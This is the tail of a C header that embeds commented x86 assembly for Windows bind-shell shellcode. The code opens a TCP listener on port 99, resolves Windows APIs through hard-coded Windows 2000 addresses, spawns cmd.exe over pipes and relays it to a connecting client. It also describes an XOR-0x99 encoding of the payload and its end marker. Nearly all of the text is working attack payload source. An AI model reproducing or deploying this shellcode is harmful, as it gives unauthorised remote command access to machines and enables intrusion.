call [ebp + offset listen - offset shellcodebegin]
cmp eax , 0
jnz @@exit

mov eax, [ebp + offset accepthand - offset shellcodebegin]
ret

@@exit: xor eax, eax                    ; failure: return 0 (the socket, if any, is not closed)
ret

sockstruc label                         ; sockaddr_in for bind (reused by getaconnect for the peer address)
sin_family dw 0002h                     ; AF_INET
sin_port dw 6300h                       ; bytes 00 63 = htons(99): the listener's TCP port
sin_addr dd 0                           ; INADDR_ANY: listens on every interface
sin_zero db 8 dup (0)

initsock endp

;******************************************************************************
*************************
;-----------------------------------------------------------------------------
; exitshell - terminate the host process.  Reached by `jz exitshell` from
; initshell when CreateProcessA fails.  No exit code is pushed, so
; ExitProcess receives whatever dword is on top of the stack; the ret is
; never reached.
;-----------------------------------------------------------------------------
exitshell proc
call [ebp + offset exitprocess - offset shellcodebegin]   ; ExitProcess - does not return
ret
exitshell endp

;******************************************************************************
*************************
;-----------------------------------------------------------------------------
; processapi - resolve every import listed in the `library` table.
; Table format: <dll name>,0, <api name>,0, ... ,0  per dll, then an extra 0.
; For each API the GetProcAddress result is written over the first 4 bytes
; of the name string, so `call [ebp + offset <name> - offset shellcodebegin]`
; elsewhere dereferences the resolved pointer.  Every name must therefore be
; at least 4 bytes long (all listed names are).
; In:   ebp = shellcode base.
; Out:  table patched in place.
; Clobb: eax, ebx, ecx, edi, flags.  No failure checking: a NULL from
;        LoadLibraryA or GetProcAddress is stored and later called.
;-----------------------------------------------------------------------------
processapi proc
;kernel api
lea edi, [ebp + offset library - offset shellcodebegin]

@@loadlib:
mov eax, edi                            ; eax = current dll name
push edi
call loadlib                            ; eax = module handle
pop edi

@@nextknlapi:
push eax                                ; keep the module handle across the scan
xor al, al
xor ecx, ecx
not ecx                                 ; ecx = -1: unbounded scan for the NUL
cld
repnz scasb                             ; edi -> byte after the current string's NUL
pop eax

cmp byte ptr [edi], 0                   ; empty string = end of this dll's list

jz @@nextlib


push eax
push edi

mov ebx, edi                            ; ebx = api name
call getproc                            ; eax = address

pop edi

mov [edi], eax                          ; overwrite the name with the address: this becomes the call slot

pop eax                                 ; restore the module handle

inc edi
inc edi
inc edi
inc edi                                 ; skip the 4 patched bytes; the scan above then finds the name's NUL

jmp @@nextknlapi

@@nextlib: inc edi                      ; step over the list terminator
cmp byte ptr [edi], 0                   ; a second consecutive 0 = end of table
jnz @@loadlib

@@ret:
ret
processapi endp

;******************************************************************************
*************************

;-----------------------------------------------------------------------------
; loadlib - LoadLibraryA(name) through the hard-coded LoadLibrary pointer
; (an OS-build-specific absolute address; see the data block).
; In:   eax = NUL-terminated dll name.
; Out:  eax = module handle (NULL on failure, unchecked).
; Clobb: eax, flags; ebx preserved for processapi.
;-----------------------------------------------------------------------------
loadlib proc ;eax=libraryname
push ebx
lea ebx, [ebp + offset LoadLibrary - offset shellcodebegin]

push eax                                ; lpLibFileName
call dword ptr [ebx]                    ; stdcall: the callee pops the argument
pop ebx
ret
loadlib endp

;******************************************************************************
*************************

;-----------------------------------------------------------------------------
; getproc - GetProcAddress(handle, name) through the hard-coded GetProcAddr
; pointer (an OS-build-specific absolute address; see the data block).
; In:   eax = module handle, ebx = NUL-terminated api name.
; Out:  eax = function address (NULL on failure, unchecked).
; Clobb: eax, flags; edi preserved because it is processapi's table cursor.
;-----------------------------------------------------------------------------
getproc proc ;eax=handle, ebx = procname
push edi
lea edi, [ebp + offset GetProcAddr - offset shellcodebegin]
push ebx                                ; lpProcName
push eax                                ; hModule
call dword ptr [edi]                    ; stdcall: the callee pops both arguments
pop edi
ret
getproc endp

;******************************************************************************
*************************

;-----------------------------------------------------------------------------
; Data.  Everything up to `dd 'xnus'` lies inside the XOR-0x99 region (zero
; bytes appear as 0x99 in the emitted C array); the marker, cmd and the
; trailing CRLF are stored in plaintext.
;-----------------------------------------------------------------------------
databegin label

library label                           ; import table walked by processapi: dll, apis..., 0; ...; 0 0

kernel db "KERNEL32", 0
createpipe db "CreatePipe", 0           ; after processapi the first 4 bytes of each api name hold its address
getstartupinfo db "GetStartupInfoA", 0
createprocess db "CreateProcessA", 0
closehandle db "CloseHandle", 0         ; resolved but never called
peeknamedpipe db "PeekNamedPipe", 0
globalalloc db "GlobalAlloc", 0
writefile db "WriteFile", 0
readfile db "ReadFile", 0
sleep db "Sleep", 0                     ; resolved but never called
exitprocess db "ExitProcess", 0

db 0                                    ; end of the KERNEL32 list

wsock32 db "WSOCK32", 0
socket db "socket", 0
bind db "bind", 0                       ; exactly 4 chars: the address overwrites the whole name
listen db "listen", 0
accept db "accept", 0
send db "send", 0
recv db "recv", 0
;wsagetlasterror db "WSAGetLastError", 0

db 0                                    ; end of the WSOCK32 list
db 0                                    ; end of table

pipeAread dd 0                          ; pipe A: cmd.exe stdout/stderr -> shellcode
pipeAwrite dd 0
pipeBread dd 0                          ; pipe B: shellcode -> cmd.exe stdin
pipeBwrite dd 0

i dd 0                                  ; bytes-transferred slot for ReadFile / WriteFile / PeekNamedPipe callers
pbuf dd 0                               ; 0x400-byte buffer from initpbuf
accepthand dd 0                         ; listening socket
sockhand dd 0                           ; current client socket

LoadLibrary dd 77e67273h                ; LoadLibraryA, Windows 2000 build 2195 (OfsShellCodeLoadLib in the header)
GetProcAddr dd 77e67031h                ; GetProcAddress, same build (OfsShellCodeGetProc in the header)

dd 'xnus'                               ; plaintext marker: the decoder stops when [esi] equals it; do not change

cmd db "cmd.exe$"                       ; command line; main replaces '$' with NUL (scans at most 32 bytes)

db 0dh, 0ah                             ; not part of the command line (it ends at the '$')

dataend label

.data                                   ; an (empty) data segment, closed immediately below
ends
end shellcodebegin                      ; entry point

*******************************************************************************
**************************/

#endif //WINSHELLCODE_H
